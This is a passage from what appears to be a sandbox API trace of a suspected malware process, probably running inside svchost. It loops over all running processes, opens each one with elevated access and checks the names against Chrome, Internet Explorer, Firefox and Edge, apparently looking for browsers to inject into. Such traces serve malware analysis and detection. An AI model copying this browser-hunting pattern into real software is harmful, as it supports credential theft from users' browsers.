	[0235.297] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.297] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0235.297] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x75d4
	[0235.298] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.298] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0235.298] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.298] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.298] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.298] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0235.299] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.299] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.299] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0235.300] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x75d8
	[0235.300] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.300] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0235.301] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.301] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.301] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.302] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0235.302] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.302] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.302] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0235.303] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0235.304] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x75dc
	[0235.305] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.305] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0235.305] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.305] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.305] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.305] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0235.306] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.306] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.306] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0235.307] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x75e0
	[0235.307] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.307] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0235.307] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.307] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.307] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.307] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0235.308] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.308] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.308] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0235.317] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x75e4
	[0235.317] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.317] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0235.318] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.318] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.318] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.318] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0235.319] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.319] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.319] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0235.320] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x75e8
	[0235.320] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.320] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0235.320] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.320] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.320] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.320] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0235.321] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.321] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.321] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0235.322] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x75ec
	[0235.322] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.322] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0235.322] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.322] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.323] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.323] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0235.323] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.323] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.323] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0235.324] CloseHandle (hObject=0x4fd0) returned 1
	[0235.324] Sleep (dwMilliseconds=0x64) 
	[0235.421] GetCurrentProcessId () returned 0x110
	[0235.421] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0235.424] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0235.425] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0235.426] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0235.427] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x75f0
	[0235.427] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.427] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0235.428] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.428] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.428] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.428] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0235.429] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.429] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.429] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0235.430] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x75f4
	[0235.430] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.430] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0235.430] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.431] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.431] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.431] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0235.431] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.431] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.432] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0235.433] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x75f8
	[0235.433] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.433] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0235.433] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.433] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.434] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.434] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0235.434] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.434] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.435] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0235.436] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x75fc
	[0235.444] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.444] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0235.444] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.444] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.445] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.445] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0235.445] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.445] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.446] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0235.447] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x7600
	[0235.448] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.448] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0235.448] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.448] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.449] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.449] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0235.450] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.450] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.450] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0235.454] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x7604
	[0235.454] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.454] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0235.455] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.455] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.456] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.456] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0235.457] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.457] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.457] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0235.459] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x7608
	[0235.460] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.460] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0235.461] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.461] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.461] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.461] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0235.462] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.462] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.462] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0235.462] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x760c
	[0235.463] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.463] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0235.463] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.463] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.463] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.463] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0235.463] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.463] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.463] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0235.464] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x7610
	[0235.464] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.464] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0235.465] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.465] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.465] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.465] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0235.465] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.465] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.465] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0235.466] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x7614
	[0235.466] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.466] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0235.467] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.467] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.468] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.468] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0235.468] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.468] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.468] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0235.469] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x7618
	[0235.469] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.469] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0235.470] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.470] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.470] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.470] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0235.470] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.470] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.470] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0235.471] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x761c
	[0235.471] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.471] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0235.472] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.472] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.472] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.472] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0235.472] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.472] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.472] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0235.473] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x7620
	[0235.473] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.473] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0235.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.474] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.474] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0235.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.474] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.474] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0235.475] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x7624
	[0235.475] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.475] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0235.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.476] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.476] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0235.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.476] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.476] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0235.477] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x7628
	[0235.477] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.477] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0235.478] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.478] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.478] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.478] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0235.478] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.478] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.478] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0235.479] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x762c
	[0235.479] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.479] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0235.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.480] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.480] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0235.481] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.481] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.481] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0235.481] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x7630
	[0235.482] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
